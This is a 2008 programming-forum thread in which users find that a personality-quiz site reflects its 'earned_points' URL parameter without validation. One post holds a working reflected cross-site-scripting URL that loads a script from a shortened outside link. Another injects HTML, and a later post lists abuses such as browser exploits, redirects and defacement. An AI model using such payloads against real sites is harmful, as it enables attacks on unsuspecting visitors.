edit: Woops... posted really long link and ruined the page horizontally ... my bad
Computer Science Canada How much are you worth? |
| Author: | Aziz [ Wed Jul 30, 2008 11:59 am ] |
| Post subject: | How much are you worth? |
I am about $260k. Check it out: http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=263090 It's been the hit on IRC lately... |
|
| Author: | Dan [ Wed Jul 30, 2008 12:01 pm ] | ||
| Post subject: | RE:How much are you worth? | ||
I am worth: http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=%3Cscript%20src=%22http://tinyurl.com/5a785n%22%3E
|
|||
| Author: | DemonWasp [ Wed Jul 30, 2008 1:33 pm ] |
| Post subject: | RE:How much are you worth? |
@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar. I'm apparently worth squat: http://www.howmuchisyoursoulworth.com/results.html?earned_points=71605 (You can rip out the &radiog##=on nonsense and it doesn't have any effect) |
|
| Author: | Tony [ Wed Jul 30, 2008 3:03 pm ] |
| Post subject: | RE:How much are you worth? |
Page source tells me the max I can be worth is Quote: <input id="max_points" value="570000" type="hidden" /> |
|
| Author: | DemonWasp [ Wed Jul 30, 2008 3:20 pm ] |
| Post subject: | RE:How much are you worth? |
That only applies as long as you don't have Firebug, though, Tony...you can modify the value of hidden inputs (or show them, etc) with the flick of a button. I sense someone about to post a screen cap of them being worth a million soul bucks. |
|
| Author: | Aziz [ Wed Jul 30, 2008 3:27 pm ] |
| Post subject: | RE:How much are you worth? |
That input has nothing to do with it, though: http://www.howmuchisyoursoulworth.com/results.html?earned_points=999999999999999999 |
|
| Author: | Tony [ Wed Jul 30, 2008 3:29 pm ] |
| Post subject: | Re: How much are you worth? |
Just a million? http://www.howmuchisyoursoulworth.com/results.html?earned_points=%3Cblink%3EGoogol%3C/blink%3E Don't even need Firebug to inject arbitrary HTML into the page. |
|
| Author: | DemonWasp [ Wed Jul 30, 2008 3:36 pm ] |
| Post subject: | RE:How much are you worth? |
Ah, my bad. I thought the max-value hidden input was on the final page, but clearly not. It clearly doesn't even make an attempt to make sure you entered something valid - strings instead of ints? Come on! It's great when pages have no validation. |
|
| Author: | Tony [ Wed Jul 30, 2008 5:16 pm ] | ||
| Post subject: | RE:How much are you worth? | ||
Not just strings, but full out HTML. The "number" is rendered by something alone the lines of
Meaning one could inject their own javascript into the page and essentially make that page do whatever they wanted. Which is exactly what Dan has done. |
|||
| Author: | LaZ3R [ Wed Jul 30, 2008 6:26 pm ] |
| Post subject: | RE:How much are you worth? |
edit: Woops... posted really long link and ruined the page horizontally ... my bad |
|
| Author: | Dan [ Wed Jul 30, 2008 9:11 pm ] |
| Post subject: | Re: RE:How much are you worth? |
DemonWasp @ 30th July 2008, 1:33 pm wrote: @Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.
Yes and no, althought this page it's self does not have any valuable cookies to steal i could still inject an expolite for old versions of IE and take out a few IE 6 users or just redirect to a shock site and piss people off  Using javascript you coudl also change any content on the page to give peoleop a false idea of what the page aucatly says. And if you are realy smart you might be able to make it make the client atack another site. |
|